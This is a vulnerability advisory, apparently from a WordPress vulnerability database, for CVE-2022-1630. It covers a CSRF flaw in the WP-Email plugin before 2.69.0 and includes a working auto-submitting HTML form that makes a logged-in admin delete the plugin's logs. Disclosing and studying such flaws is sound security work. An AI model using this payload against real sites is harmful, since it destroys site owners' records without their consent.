WP-Email < 2.69.0 – Log Deletion via CSRF | CVE 2022-1630 | Plugin Vulnerabilities

Description

The plugin does not protect its log deletion functionality with nonce checks, allowing attacker to make a logged in admin delete logs via a CSRF attack

Proof of Concept

<form id="test" action="https://example.com/wp-admin/admin.php?page=wp-email/email-manager.php" method="POST">
    <input type="text" name="delete_logs_yes" value="yes">
    <input type="text" name="delete_logs" value="Delete">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

Fixed in 2.69.0

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

178d0c49-3a93-4948-8734-f3d7518361b3

Timeline

Publicly Published

2022-05-30 (about 3 years ago)

Added

2022-05-30 (about 3 years ago)

Last Updated

2023-02-23 (about 2 years ago)

Other

Published

Title

Published

2025-03-24

Title

EZ SQL Reports Shortcode Widget and DB Backup 4.11.13 - 5.25.08 - Cross-Site Request Forgery to Remote Code Execution

Published

2022-01-19

Title

AnyComment < 0.2.18 - Arbitrary HyperComments Import/Revert via CSRF

Published

2024-11-01

Title

MDR Webmaster Tools <= 1.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-03-11

Title

Delete Original Image <= 0.4 - Cross-Site Request Forgery

Published

2023-11-02

Title

Decorator - WooCommerce Email Customizer < 1.2.8 - Cross-Site Request Forgery